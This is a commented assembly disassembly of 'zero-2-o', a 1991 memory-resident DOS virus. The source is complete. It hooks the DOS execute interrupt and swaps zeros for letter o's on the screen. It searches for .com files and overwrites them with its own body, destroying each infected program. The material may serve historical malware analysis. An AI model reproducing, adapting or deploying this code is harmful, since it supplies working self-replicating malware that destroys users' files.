;zero-2-o virus - memory resident overwriting virus.

;extremely simple, but it will destroy any file it infects.

;infects .com files (by searching the directory as a direct action would)
;whenever int 21h, function 4bh (execute) is called. at this point, it will
;also change any 0's on the screen (in normal text mode) to o's.

;note: the name 'format.com' appears in this file only because it was the
;last file infected by the virus.

;disassembly by black wolf

.model tiny
.code

org 100h
start:
jmp entry_point ; (026d)

data_area: ;this is the data area of the file i received. of course,

;since this is mainly dynamic such as the dta, much of
;the data in this area will change with each infection.

store_sp dw 837h
store_ss dw 0b6fh
store_ax dw 4b00h

virus_stack:

virus_label db 0,0dh,0ah
db 'scud 1991!'
db 0dh, 0ah

random_stack_data:
db 0,0,0,0,0f0h,03,0bh,9bh,2ch,0,1,0
db 1,65h,1,6ch,15h,9bh,40h,5,0,6ch,15h,0dfh
db 40h,5,0,93h,1,0,1,0,1,0,1,81h
db 0,0dfh,0ch,6fh,0bh,45h,2,0dfh,0ch,6,0f0h,0
db 1,0,1,6fh,0bh,2ah,9bh,0b9h,41h,6fh,0bh,3
db 0dh,0,4bh
top_of_stack:

db 00h, 00h
oldint21add dd 0cb00194h
filemask db '*.com',0
victims_handle dw 5
virusdta db 1,'????????com',0
db 3,0,0,0,2eh,8bh,26h,68h,20h,0,60h,72h,0eh
nextfiles_size dw 2d65h
db 0, 0
nextfiles_name db 'format.com',0
db 0,0,0,4ah,52h,34h
int21_handler:
mov cs:[store_sp],sp
mov cs:[store_ss],ss
mov cs:[store_ax],ax

;this is changed because tasm automatically converts it to a mov sp,109.

 db 8dh,26h,09h,01h ;lea sp,cs:[109h]
;109h = virus stack

add sp,top_of_stack-virus_stack ;create stack frame

mov ax,cs
mov ss,ax ;set ss:sp = cs:(109h+4eh)

mov ax,cs:store_ax ;restore ax to orig.

cmp ah,4bh ;load and execute?

je activate_and_infect
jmp leave_int21

activate_and_infect:
push ax bx cx dx ds es si di
mov ax,0b800h
mov ds,ax ;ds:bx = video memory for
mov bx,0 ; normal text mode.
change_0_to_o:
mov al,[bx] ;get character on screen
cmp al,'0' ;is it a '0'?
jne goto_next_char ;no, put it back and go on...
mov al,'o' ;yes, change it to 'o'

goto_next_char:
mov [bx],al ;place character back onto
inc bx ;screen.
inc bx ;go to next character...
cmp bx,1000h ;check if we are a little
jne change_0_to_o ;past the end of screen.

mov ax,cs
mov ds,ax
mov dx,offset virusdta
mov ah,1ah

pushf
call cs:oldint21add ;set dta....

mov ax,cs
mov ds,ax
mov dx,offset filemask
mov cx,0
mov ah,4eh

pushf
call cs:oldint21add ;find first match...

jc done_infections
cmp nextfiles_size,end_virus-start
jne overwrite_file

findnextfile:
mov ah,4fh

pushf
 call cs:oldint21add

jc done_infections
cmp nextfiles_size,end_virus-start
jne overwrite_file
jmp short findnextfile

overwrite_file:
mov ax,cs
mov ds,ax
mov dx,offset nextfiles_name
mov ah,3ch
mov cx,0
pushf
call cs:oldint21add ;truncate/create file...

mov victims_handle,ax ;save victim's file hand.

mov ax,cs
mov ds,ax
mov bx,victims_handle
mov cx,end_virus-start
mov dx,100h
mov ah,40h
pushf
call cs:oldint21add ;write virus to file..

mov bx,victims_handle
mov ah,3eh ;and close it...
pushf

call cs:oldint21add

done_infections:
pop di si es ds dx cx bx ax

leave_int21:
mov sp,cs:store_sp
mov ax,cs:store_ss
mov ss,ax
mov ax,cs:store_ax
jmp cs:oldint21add

entry_point:
mov ax,cs
mov ds,ax
mov es,ax
mov ss,ax
mov ax,3521h
int 21h ;get int 21 address...

mov word ptr oldint21add,bx

mov word ptr oldint21add+2,es
mov ax,cs
mov ds,ax
mov ax,2521h
mov dx,offset int21_handler
int 21h ;set it to viral handler
 mov dx,offset end_virus
int 27h ;go tsr

end_virus:
end start